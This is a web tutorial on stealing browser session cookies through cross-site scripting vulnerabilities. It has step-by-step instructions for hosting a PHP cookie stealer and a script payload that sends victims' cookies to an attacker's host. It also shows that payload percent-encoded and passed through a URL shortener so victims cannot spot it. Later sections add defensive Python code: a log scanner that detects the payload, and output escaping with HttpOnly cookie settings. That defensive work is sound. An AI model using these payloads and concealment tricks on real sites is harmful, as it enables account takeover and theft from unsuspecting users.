How to do Cookie Stealing with Cross-Site Scripting Vulnerabilities? : XSS Tutorials



If anyone tries these hacks against any company or whatever, it makes him trespass the security measures and brings him under legal justice. This tutorial is only for the improvement of security and for PenTesting and research by legal security organizations.

Requirements:
A cookie stealer code: get it from here
Free web hosting service
Basic knowledge about XSS
Basic knowledge about browser cookies
Cookie stealing is the process of exploiting an XSS vulnerability (non-persistent or persistent) to grab the cookie of a victim who visits the infected link. These cookies will then be used to compromise their accounts.

Step 1: Creating the Cookie Stealer PHP file
Get the cookie stealer from the link I mentioned. In that post, I described three versions of the cookie stealer. We are going to use the third version.
Copy the code.
Open Notepad and paste the code.
Save the file with the .php extension.
Eg: Stealer.php
Now create a new file and save it as log.txt (leave it blank). Don't change the name; this is the filename we specified in the PHP file.

Now you will have two files;
1. Stealer.php
2. log.txt

What do these two files do exactly?
The Stealer.php file above reads the visitor's IP address and cookie and stores the data in the log.txt file.
The log.txt file holds the cookies and IP address data.

Step 2: Hosting the files
Register with a free web-hosting service and log in to your cPanel.
Now open the File Manager in cPanel.
Upload Stealer.php and log.txt to the root directory or the public_html directory.

Now the stealer will be at hxxp://www.YourSite.com/Stealer.php .

Step 3: Exploiting the XSS Vulnerability
So far, we have sharpened our saw. Now we are going to use it.
Once you have set up everything and found a vulnerable website, inject the following code into the vulnerable website's input:

<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

Cookie Stealing with Non-Persistent vs Persistent XSS:
Persistent: if you inject this code into a website vulnerable to persistent XSS, it stays there permanently until the administrator discovers it. It will be shown to all users, so attackers don't need to send any link to others. Whoever visits the web page becomes a victim.

Non-Persistent:
In the case of a non-persistent attack, the attacker has to send the link to the victims. Whenever they open the link, it will steal their cookie. Most websites are vulnerable to non-persistent XSS.

In non-persistent XSS, attackers send the injected link to victims.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

The above link clearly reveals the script. Attackers can hex-encode (percent-encode) the script so that the victim can't see it in the link.
For Example:
hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e
Still, the link looks long. The attacker uses one more technique to hide the long URL: URL-shortening services. There are lots of websites that shorten a long URL into a small one.

For example:
hxxp://www.tinyexample.com/twrwd63

Once the victim opens the link, his cookie will be saved in the log.txt file.
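As an added example (not from the original post or the stealer code it links to), the following Python script shows the defender's side of the hex-encoding trick: it parses web-server access-log lines, percent-decodes each query parameter (repeatedly, so double encoding does not hide the payload either) and flags requests that contain the markers of the payload shown above (a script tag, a read of document.cookie, a redirect through location.href). The log lines are constructed sample data; the log format, field names and indicator patterns are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Indicators taken from the payload shown in this tutorial: a <script> tag,
# a read of document.cookie and a redirect through location.href.
INDICATORS = {
    "script_tag": re.compile(r"<\s*/?\s*script\b", re.IGNORECASE),
    "document_cookie": re.compile(r"document\s*\.\s*cookie", re.IGNORECASE),
    "location_redirect": re.compile(r"location\s*\.\s*(href|assign|replace)", re.IGNORECASE),
}

# Common/combined access-log format (assumed): client IP, timestamp, request line, status.
LOG_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (not real traffic). The second line carries the
# percent-encoded payload reproduced in this tutorial; the third is the same idea
# double-encoded, which a single decode pass would miss.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?search=cookies+recipe HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:57:02 +0000] "GET /index.php?search='
    '%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f'
    '%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f'
    '%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e'
    ' HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2023:13:58:41 +0000] "GET /index.php?search='
    '%253Cscript%253Edocument.cookie%253C%252Fscript%253E HTTP/1.1" 200 512',
]


def fully_decode(text: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so that double-encoded payloads are revealed."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan_uri(uri: str) -> list:
    """Return the sorted names of XSS indicators found in the query parameters of a request URI."""
    hits = set()
    for _, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        decoded = fully_decode(value)  # parse_qsl already decoded one layer
        for name, pattern in INDICATORS.items():
            if pattern.search(decoded):
                hits.add(name)
    return sorted(hits)


def scan_log(lines) -> list:
    """Parse access-log lines and report only the requests that carry XSS indicators."""
    findings = []
    for line in lines:
        match = LOG_LINE_RE.match(line)
        if not match:
            continue  # skip lines in an unexpected format instead of crashing
        hits = scan_uri(match.group("uri"))
        if hits:
            findings.append({"ip": match.group("ip"), "uri": match.group("uri"), "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], ", ".join(finding["indicators"]), finding["uri"][:60] + "...")
```

Run against the sample, the benign "cookies recipe" search is ignored while both the single- and the double-encoded requests are reported with the indicators they matched. A shortened URL does not change this: the redirect still lands on the vulnerable site, so the decoded payload still appears in that site's own access log.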

How to be protected from this attack?
Use the NoScript add-on. This is the best protection to keep away from XSS.
Never blindly click a shortened URL.
Sometimes you may want to follow a shortened link. If so, clear all cookies in your browser first and open it through a proxy or VPN (it will hide your IP).
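The advice above is for the browser side. As an added example that is not part of the original post, the following Python code shows the two server-side fixes that defeat this particular attack: HTML-escaping the reflected search parameter so the injected script tag is rendered as text instead of executed, and setting the session cookie with HttpOnly (plus Secure and SameSite) so that document.cookie does not expose it even when a script does run. The page template, the cookie name "session" and the session value are assumptions constructed for the example; the vulnerable renderer is shown only as the contrast to the hardened one.

```python
import html
from http.cookies import SimpleCookie

# Stand-in for the results page of a site like the index.php in the tutorial
# (assumed template, not from the original post).
PAGE_TEMPLATE = "<html><body><h1>Results for: {term}</h1></body></html>"


def render_search_vulnerable(term: str) -> str:
    """Reflect the search term unescaped.

    This is the mistake behind the non-persistent XSS in the tutorial: whatever
    arrives in ?search= is copied into the HTML, so a <script> tag executes.
    """
    return PAGE_TEMPLATE.format(term=term)


def render_search_safe(term: str) -> str:
    """Reflect the search term HTML-escaped so the browser treats it as text."""
    return PAGE_TEMPLATE.format(term=html.escape(term, quote=True))


def session_cookie_header(session_id: str) -> str:
    """Build a Set-Cookie value for a session cookie that page script cannot read.

    HttpOnly keeps the cookie out of document.cookie, so the stealer payload gets
    nothing even if XSS fires; Secure keeps it off plain HTTP; SameSite=Lax stops
    most cross-site requests from carrying it.
    """
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Lax"
    jar["session"]["path"] = "/"
    return jar["session"].OutputString()


def cookie_is_hardened(header: str) -> bool:
    """Check a Set-Cookie value for HttpOnly, Secure and a SameSite attribute (case-insensitive)."""
    parts = {part.strip().lower() for part in header.split(";")}
    return {"httponly", "secure"} <= parts and any(part.startswith("samesite=") for part in parts)


if __name__ == "__main__":
    injected = "<script>document.cookie</script>"  # constructed test input
    print(render_search_vulnerable(injected))
    print(render_search_safe(injected))
    print("Set-Cookie:", session_cookie_header("constructed-session-id"))
```

The two fixes are independent and both are worth having: output escaping removes the injection itself, while HttpOnly limits the damage if some other reflection point is missed. A quick audit of an existing site is to look at its Set-Cookie headers with a function like cookie_is_hardened above; a session cookie without HttpOnly is exactly what the stealer in this tutorial relies on.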